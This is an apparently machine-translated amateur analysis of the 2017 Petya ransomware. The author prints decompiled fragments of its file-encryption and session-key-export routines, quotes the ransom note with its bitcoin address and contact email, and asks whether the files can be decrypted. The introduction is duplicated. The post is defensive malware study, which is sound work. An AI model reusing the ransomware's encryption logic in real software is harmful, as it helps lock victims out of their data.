Day after the Petya virus
I am not a writer, I am a reader. But I consider it necessary to share.
I'll be brief, but forgive me. This opus is only a desire to share the result of 10-12 hours of sticking to the decompiled virus code.
Who cares, continued below.
From the very beginning (and it was about 13-00 on the 27th), after the first call from friends, about the symptoms, he began to monitor the network for information. It unfortunately is not enough and so far.
')
By 5 pm, a sistemnik was brought up.
So.
→ h ** ps: //gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759 - this is where the virus file came from.
→ h ** ps: //retdec.com/decompilation-run/ - here it is decompiled.
Immediately make a reservation - I'm not a writer, but under windows all the more, so I had to spend quite a lot of time studying the received code.
Actually two things that I discovered and want to share.
1. Files smaller than 1 MB (0x100000) are fully encrypted. More - only the 1st megabyte is encrypted:
I noticed the same thing, scanning the encrypted files on the computer I brought.
2. Each logical volume in the system is encrypted with its key. At the root of each disk, a README.TXT file is created with the same contents as is displayed on the screen after the end of the encryption and after the reboot, as I understand it (I personally have not seen the screen). But the key is different on two sections of the disk that I picked.
Here I would like to ask the help of experts in encryption.
The third parameter of the CryptExportKey function is 1, this is the export of the session key. And this key as I understand it is stored in the README.TXT.
Actually the question is - is it possible to import it and decrypt the files? This is not a public key. It is clear that give privat problems would not be.
Actually, I paid more attention to the encryption functions, the rest did not interest me.
Well, the opinion of a simple man in the street - this attack is a continuation of the May session, as a result of which, apparently, the goal was not achieved. Because about 160-180 thousand have not been touched on wallets since the last attack. If the goal was to receive money, they would have started to launder them For a little more than a day, 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX transferred just a little more than $ 10,000 to the wallet. This, of course, is a consequence of the fact that the last time nobody received any decryption keys.
I hope my first article will not be the last. With pleasure I will correct the arisen errors.
I'll be brief, but forgive me. This opus is only a desire to share the result of 10-12 hours of sticking to the decompiled virus code.
Who cares, continued below.
From the very beginning (and it was about 13-00 on the 27th), after the first call from friends, about the symptoms, he began to monitor the network for information. It unfortunately is not enough and so far.
')
By 5 pm, a sistemnik was brought up.
So.
→ h ** ps: //gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759 - this is where the virus file came from.
→ h ** ps: //retdec.com/decompilation-run/ - here it is decompiled.
Immediately make a reservation - I'm not a writer, but under windows all the more, so I had to spend quite a lot of time studying the received code.
Actually two things that I discovered and want to share.
1. Files smaller than 1 MB (0x100000) are fully encrypted. More - only the 1st megabyte is encrypted:
// 0x100018da if (v6 <= lpFileMappingAttributes) { if (lpFileSize <= 0x100000) { // // 0x10001958 dwNumberOfBytesToMap = (struct _LARGE_INTEGER *)lpFileSize; pdwDataLen = dwNumberOfBytesToMap; dwMaximumSizeLow = 16 * (lpFileSize / 16 + 1); // branch -> 0x100018eb // 0x100018eb hFileMappingObject = CreateFileMappingW((char *)hFile2, (struct _SECURITY_ATTRIBUTES *)lpFileMappingAttributes, 4, lpFileMappingAttributes, dwMaximumSizeLow, (int16_t *)lpFileMappingAttributes); dwFileOffsetHigh = lpFileMappingAttributes; if ((int32_t)hFileMappingObject != dwFileOffsetHigh) { // 0x100018ff pbData = MapViewOfFile(hFileMappingObject, 6, dwFileOffsetHigh, dwFileOffsetHigh, (int32_t)dwNumberOfBytesToMap); v4 = (int32_t)pbData; hFile2 = v4; hHash = lpFileMappingAttributes; if (v4 != hHash) { // 0x10001913 hKey = *(int32_t *)(a2 + 20); v5 = CryptEncrypt(hKey, hHash, (int32_t)(struct _SECURITY_ATTRIBUTES *)1 % 2 != 0, hHash, pbData, (int32_t *)&pdwDataLen, dwMaximumSizeLow); if (v5) { // 0x1000192e FlushViewOfFile((char *)hFile2, (int32_t)pdwDataLen); // branch -> 0x10001938 } // 0x10001938 UnmapViewOfFile((char *)hFile2); // branch -> 0x1000193f } // 0x1000193f CloseHandle(hFileMappingObject); // branch -> 0x10001948 } // 0x10001948 handleClosed = CloseHandle(hFile); // branch -> 0x10001951 // 0x10001951 g8 = v1; g4 = v3; return (char *)handleClosed; } } // 0x100018e6 pdwDataLen = (struct _LARGE_INTEGER *)0x100000; // 1 struct _SECURITY_ATTRIBUTES * v8 = (struct _SECURITY_ATTRIBUTES *)lpFileMappingAttributes; lpFileMappingAttributes2 = v8; v7 = v8; dwNumberOfBytesToMap2 = (struct _LARGE_INTEGER *)0x100000; dwMaximumSizeLow = 0x100000; // branch -> 0x100018eb } I noticed the same thing, scanning the encrypted files on the computer I brought.
2. Each logical volume in the system is encrypted with its key. At the root of each disk, a README.TXT file is created with the same contents as is displayed on the screen after the end of the encryption and after the reboot, as I understand it (I personally have not seen the screen). But the key is different on two sections of the disk that I picked.
Ooops, your important files are encrypted.
If you see this text, then your files are no longer accessible, because
they have been encrypted. Recover
your files, but don't waste your time. Nobody can recover your files without
our decryption service.
We can recover your files safely and easily.
All the need to do so.
Please follow the instructions:
1. Send $ 300 worth of Bitcoin to the following address:
1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
2. Send your Bitcoin wallet ID wowsmith123456@posteo.net.
Your personal installation key:
AQIAAA5mAAAApAAAuoxiZtYONU + IOA / XL0Yt / lsBOfNmT9WBDYQ8LsRCWJbQ3iTs
Ka1mVGVmMpJxO + bQmzmEwwiy1Mzsw2hVilFIK1kQoC8lEZPvV06HFGBeIaSAfrf6
6kxuvs7U / fDP6RUWt3hGT4KzUzjU7NhIYKg2crEXuJ9gmgIE6Rq1hSv6xpscqvvV
Fg4k0EHN3TS9hSOWbZXXsDe9H1r83M4LDHA + NJmVM7CKPCRFc82UIQNZY / CDz / db
1IknT / oiBDlDH8fHDr0Z215M3lEy / K7PC4NSk9c + oMP1rLm3ZeL0BbGTBPAZvTLI
LkKYVqRSYpN + Mp / rBn6w3 + q15DNRlbGjm1i + ow ==
Here I would like to ask the help of experts in encryption.
void function_10001c7f(void) { int32_t dwFlags = 0; // ebx int32_t hKey = *(int32_t *)(g3 + 20); // 0x10001ca0 int32_t pdwDataLen = 0; int32_t v1; if (!CryptExportKey(hKey, *(int32_t *)(g3 + 12), 1, 0, NULL, &pdwDataLen)) { // 0x10001d2a g3 = (int32_t)NULL; g4 = v1; return; } char * memoryHandle = LocalAlloc(64, pdwDataLen); // 0x10001cb1 if ((int32_t)memoryHandle == dwFlags) { // 0x10001d2a g3 = (int32_t)NULL; g4 = v1; return; } int32_t hExpKey = *(int32_t *)(g3 + 12); // 0x10001cc6 int32_t hKey2 = *(int32_t *)(g3 + 20); // 0x10001cc9 if (CryptExportKey(hKey2, hExpKey, 1, dwFlags, memoryHandle, &pdwDataLen)) { int32_t pcchString = dwFlags; bool v2 = CryptBinaryToStringW(memoryHandle, pdwDataLen, 1, (int16_t *)dwFlags, &pcchString); // 0x10001ce8 if (v2) { char * memoryHandle2 = LocalAlloc(64, 2 * pcchString); // 0x10001cf6 int32_t hMem = (int32_t)memoryHandle2; // 0x10001cf6_6 if (hMem == dwFlags) { // 0x10001d21 LocalFree(memoryHandle); // branch -> 0x10001d2a // 0x10001d2a g3 = (int32_t)NULL; g4 = v1; return; } The third parameter of the CryptExportKey function is 1, this is the export of the session key. And this key as I understand it is stored in the README.TXT.
Actually the question is - is it possible to import it and decrypt the files? This is not a public key. It is clear that give privat problems would not be.
Actually, I paid more attention to the encryption functions, the rest did not interest me.
Well, the opinion of a simple man in the street - this attack is a continuation of the May session, as a result of which, apparently, the goal was not achieved. Because about 160-180 thousand have not been touched on wallets since the last attack. If the goal was to receive money, they would have started to launder them For a little more than a day, 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX transferred just a little more than $ 10,000 to the wallet. This, of course, is a consequence of the fact that the last time nobody received any decryption keys.
I hope my first article will not be the last. With pleasure I will correct the arisen errors.
Source: https://habr.com/ru/post/331978/
All Articles